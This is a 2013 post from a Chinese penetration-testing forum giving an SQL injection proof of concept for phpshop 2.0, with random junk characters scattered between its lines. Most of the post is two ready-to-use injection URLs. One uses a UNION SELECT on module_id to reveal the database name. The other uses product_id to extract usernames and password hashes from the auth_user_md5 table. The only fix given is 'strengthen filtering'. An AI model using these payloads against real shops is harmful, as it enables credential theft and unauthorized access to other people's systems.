中国网络渗透测试联盟
标题:
phpshop 2.0 SQL注入及修复
[打印本页]
作者:
admin
时间:
2013-1-18 18:24
标题:
phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
6 v. a0 v ~3 W# U& o
( {1 M/ ]& S5 M1 _: P; _
作者 : By onestree
2 D& Y# B( I) A+ w
下载地址 :
http://code.google.com/p/phpshop/downloads/list
4 M5 a I- y+ B0 Q2 C- s
测试地址: windows 7 / ubuntu
& Z0 b( ^" }2 [9 ]
# e( k% j; S3 Y
& ]! P1 m; o/ }- Y
SQLi p0c:
0 A1 ?$ ~0 s$ |: p& b
3 J& J8 Z- f/ v, E4 V. V; Q4 X
==================
+ G+ j% g# ]; H' O. O
% K) `* y; u) ?
http://www.xxx.com
/phpshop 2.0/?page=admin/function_list&module_id=11'
: n* Y4 k0 r8 W1 @$ ?
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
. E- w3 J0 m/ f8 V! [
( \; V; h6 n7 ~+ q, V
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
8 D. t7 c" `# t2 p; d5 p
. _" y- C& a c# k2 O
修复:
4 N3 X1 k1 Y( E, B# @8 y
加强过滤
/ A* g/ U" B5 G
. I; E8 r# j' J1 V- z' S3 J
# {( I, `' d; U8 F
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2